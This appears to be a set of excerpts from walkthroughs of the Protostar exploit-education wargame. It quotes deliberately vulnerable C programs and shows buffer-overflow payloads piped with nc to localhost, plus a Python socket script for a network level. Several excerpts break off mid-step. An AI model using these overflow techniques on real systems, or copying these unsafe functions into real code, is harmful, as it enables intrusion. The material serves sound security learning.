Final0 The application is expecting a username and then returns it in Upper case $ nc localhost 2995 alvaro No such user ALVARO The buffer is 512 bytes long but we need to look for the EIP overwrite offset since the compiler can change the buffer size to align it or other nasty reasons. We start trying to segfault the program till we get it with: echo `python -c 'print "A"*532 + "DDDD"'` | nc localhost 2995 We can verify it with gdb and the core dump:

Net 0 In this level we are presented with an integer and we have to reply the server with a little endian version of the integer. We use python and the struct module to do the conversion for us: from socket import * from struct import * s = socket(AF_INET, SOCK_STREAM) s.connect(("localhost", 2999)) challange = s.recv(1024) start = challange.find("'") + 1 end = challange.find("'", start) num = int(challange[start:end]) print "Challange: " + str(num) li = pack("<I", num) s.

Heap0 In Heap0 we are given the following vulnerable code: #include <stdlib.h> #include <unistd.h> #include <string.h> #include <stdio.h> #include <sys/types.h> struct data { char name[64]; }; struct fp { int (*fp)(); }; void winner() { printf("level passed\n"); } void nowinner() { printf("level has not been passed\n"); } int main(int argc, char **argv) { struct data *d; struct fp *f; d = malloc(sizeof(struct data)); f = malloc(sizeof(struct fp)); f->fp = nowinner; printf("data is at %p, fp is at %p\n", d, f); strcpy(d->name, argv[1]); f->fp(); } From a quick peek to the source code, we can see that our first argument can overflow the d->name buffer (64bytes) and so overwrite the f->fp pointer.

Format0 In Format0 we are given the following vulnerable code: #include <stdlib.h> #include <unistd.h> #include <stdio.h> #include <string.h> void vuln(char *string) { volatile int target; char buffer[64]; target = 0; sprintf(buffer, string); if(target == 0xdeadbeef) { printf("you have hit the target correctly :)\n"); } } int main(int argc, char **argv) { vuln(argv[1]); } This is not really a format string vulnerability, our argument is going to be written in buffer with no size checks and buffer is just above target so we can overwrite it:

Stack0 In Stack0 we need to exploit the following program: #include <stdlib.h> #include <unistd.h> #include <stdio.h> int main(int argc, char **argv) { volatile int modified; char buffer[64]; modified = 0; gets(buffer); if(modified != 0) { printf("you have changed the 'modified' variable\n"); } else { printf("Try again?\n"); } } Since modified variable is between saved EBP and buffer any character overflowing buffer will change modified: user@protostar:~$ echo `python -c 'print("A"*64)'` | /opt/protostar/bin/stack0 Try again?